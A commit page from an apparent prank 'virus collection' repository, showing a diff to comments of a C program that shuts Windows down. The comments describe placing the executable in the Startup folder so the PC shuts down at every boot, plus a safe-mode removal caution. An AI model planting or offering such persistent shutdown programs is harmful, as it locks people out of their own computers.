mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2025-12-08 05:40:40 -08:00
Simply shuts the system down.
This commit is contained in:
@@ -1,5 +1,10 @@
|
|||||||
// Simply shuts the system down.
|
// Simply shuts the system down.
|
||||||
// Put it in the startup directory (%appdata%\Microsoft\Windows\Start Menu\Programs\Startup)
|
// Put the compiled executable in the startup directory
|
||||||
|
// (%appdata%\Microsoft\Windows\Start Menu\Programs\Startup)
|
||||||
|
// of WindowsOS. And be the Devil!
|
||||||
|
// Caution: This will prevent you from turning the PC on. To
|
||||||
|
// solve, you can turn on the PC in safe mode and remove the
|
||||||
|
// executable from the startup directory.
|
||||||
|
|
||||||
#include <stdlib.h>
|
#include <stdlib.h>
|
||||||
|
|
||||||
|
|||||||
Reference in New Issue
Block a user